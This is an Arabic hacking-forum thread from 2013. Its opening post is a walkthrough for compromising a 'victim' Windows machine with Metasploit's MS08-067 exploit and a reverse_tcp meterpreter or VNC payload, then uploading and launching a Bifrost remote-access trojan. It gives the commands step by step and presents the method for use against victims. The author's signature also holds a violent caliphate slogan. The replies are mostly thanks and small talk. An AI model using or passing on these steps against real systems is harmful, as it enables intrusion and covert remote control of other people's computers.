المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : اختراق جهاز الضحية بطريقة Metasploit ورفع سيرفر Bifrost



الهلال منسي
02-20-2013, 10:31 PM
http://www.m5zn.com/image.php?img=10944490.jpg

بعد التحية والصلاه والسلام على سيد البشر
محمد صل الله عليه وسلم وعلى اله وصحبة اجميعن
اتيت اليكم بشرح لكيفية اختارق جهاز (http://www.3asfh.net/vb/t122794.html) الضحية (http://www.3asfh.net/vb/t122794.html)Metasploit ورفع (http://www.3asfh.net/vb/t122794.html) سيرفر (http://www.3asfh.net/vb/t122794.html) بيفروست
سأتحدث عن سيطرة الجهاز بإستخدام
playoad windows/vncinject
تم تطبيق الشرح على جهاز (http://www.3asfh.net/vb/t122794.html) افتراضي
الشرح

http://img194.imageshack.us/img194/9891/20090702183620.png

إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits

http://img27.imageshack.us/img27/5264/exploitscmd3.png

ونختار windows/smb/ms08_067_netapi

show payloads

http://img25.imageshack.us/img25/3329/payloads.png

ونختار windows/meterpreter/reverse_tcp
أو نختارها مباشرة كما ف الصورة
والآن نقوم بتحديد IP الضحية (http://www.3asfh.net/vb/t122794.html) وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101
ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter

http://img16.imageshack.us/img16/7027/setexploit5.png

كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445
لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\
كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد
C:\Program Files\****sploit\Framework3

http://img139.imageshack.us/img139/4131/launchexploit6.png

بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:
use -m process
execute -f cmd.exe -c
interact 3
كما في الصورة حسب رقم channel أو session المفتوح

http://img139.imageshack.us/img139/4131/launchexploit6.png

لتشغيل السيرفر start server.exe
وكما توضح الصورة نجاح تحميل السيرفر

http://img37.imageshack.us/img37/6270/73006251.png

والصور تعبر عن نفسها

http://img190.imageshack.us/img190/6250/30769969.png

شاشة الضحية

http://img197.imageshack.us/img197/482/55987753.png

لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال
windows/meterpreter/smb/ms08_067_netapi
set windows/vncinject/reverse_tcp
بتطبيق الثغرة ستفتح لنا الشاشة التالية

http://img269.imageshack.us/img269/1700/11vncinject.png

الموضوع منقول للفائدة شكرا لكاتب الموضوع
تحياتي وتقديري
تم بفضل من الله
كل مانرجو الدعاء في ضهر الغيب لوالديا ووالديكم
بالرحمه والمغفرة ولجميع المسلمين من المضلومين
اخوكم في الله والاسلام
الهلال منسي
الخلافة ولو على جماجمنا
الاختارق عبر الايب اخطر طبخة هكر طعمها مر على الضحية

http://www.m5zn.com/image.php?img=10944491.jpg

aymen cyril kamar
02-20-2013, 11:28 PM
مشكور و الله يجازيك موضوع مهم جدا بالنسبة للمبتداين
بالتوفيق..

الهلال منسي
02-20-2013, 11:37 PM
السلام عليكم
وفي بارك الله اخي الفاضل يسرني ردك
وشكرا لمرورك واتمنى ان اقدم الجديد الذي يستفيد منه الجميع
تحياتي وتقدير حفضكم الله جميعا

Mr.JnOoN
02-20-2013, 11:41 PM
السلام عليكم
وفي بارك الله اخي الفاضل يسرني ردك
وشكرا لمرورك واتمنى ان اقدم الجديد الذي يستفيد منه الجميع
تحياتي وتقدير حفضكم الله جميعا


بصراحة اقولها لك
انت وصلت قمة الابدااااع
اهنيك يا بطل
بالتوفيق

الهلال منسي
02-21-2013, 12:52 AM
بصراحة اقولها لك
انت وصلت قمة الابدااااع
اهنيك يا بطل
بالتوفيق

السلام عليكم جميعا
بالله عليك اخي كيف لا اهتم بوضع شرح او موضوع يعجبكم
اذا لم تكن ردودك قاتله رفعتو من قدري رفع الله من قدركم دنياء واخره
شكرا جزيلا
اخوكم اقلكم خبرة ومعرفة
الهلال منسي

Mr.JnOoN
02-21-2013, 01:40 AM
تسلم يا غالي قدرك عالي
بالتوفيق

touita
02-21-2013, 02:29 AM
روعة لوحة فنية من شخص فنان تحياتي و احتراماتي اخي هلال عجبتني طبخة هكر ههههههههه حتكون كسكسي يعني ههههههههههههه

الهلال منسي
02-21-2013, 02:57 AM
السلام عليكم جميعا
بارك الله فيك ون راك غبت بزاف تحب تهبلنا ولا كيفاه
ان شاء الله تكون حتى لتما
يسرني مرورك خو ومالا الجمعة ناكول في الطعام بس انا نحب طاجين بالزيتون
كيما يقولو السككديا نتيبو في رحبا
ولا اصحاب العاصمة نديرو فيها مرميطا تخليك ماتفهم والو
هههههههههههههه

MJNONFIK
02-21-2013, 11:24 AM
مشكور لاكن باين ان الموضوع قديم مرة :]

shhaby
02-21-2013, 11:35 AM
بارك الله فيك بالتوفيق اخي العزيز .

الهلال منسي
02-21-2013, 12:28 PM
السلام عليكم جميعا
بارك الله فيك اخي شهابي يسرني مرورك وردك الطيب
وان شاء الله اكون عند حسن الضن
تحياتي واحترامي حفضكم الله جميعا


- - - تم التحديث - - -



مشكور لاكن باين ان الموضوع قديم مرة :]
الله يهديك ويهدينا طيب الكل عارف ان الشرح قديم يعني ضروري تفضحني
هههههه امزح
طيب اخي شمر يدك وحط شرح جديد ونستفيد الجميع منه مش ضروري تعيب عليا اني وضعت شرح قديم
تحياتي لمرورك وانتضر ردك بالشرح ان شاء الله

hamdymadi
02-21-2013, 02:07 PM
شكراااااااااااااااااااااا ااااااااااااااااااااااااا

touita
02-21-2013, 02:25 PM
الله لا يغيبك اخي هلال هي ضروف العمل تخليني اغيب حتى على المنزل :( على العموم الحمد لله انكم بخير و تمام ليك عليا عزومة طاجين زيتون بالجاج ههههه لما تشرفنا بالزيارة الى مرتع الشهداء تحياتي و احتراماتي للجميع

الهلال منسي
02-21-2013, 02:34 PM
السلام عليكم جميعا
لا شكر على واجب يسرني مروركم وردكم الطيب
حياك الله اخي الله يكون في عونك وعون الجميع حال الدنياء كفاح وين مارحت
نسال الله السلامه والعافيه والرزق الحلال وشهادة في سبيله
اللهم امين
تحياتي واحترامي حفضكم الله جميعا

Teka
02-22-2013, 09:18 PM
هذه الطريقه للاختراق الداخلي فقط انت جربتها على اخطراق خارجي؟؟

hackerpk
02-22-2013, 10:27 PM
ما شاء الله عليك

الهلال منسي
02-22-2013, 10:36 PM
السلام عليكم جميعا
تشكر اخي الفاضل تحياتي واحترامي

sohayl111
02-26-2013, 09:15 AM
بارك الله فيك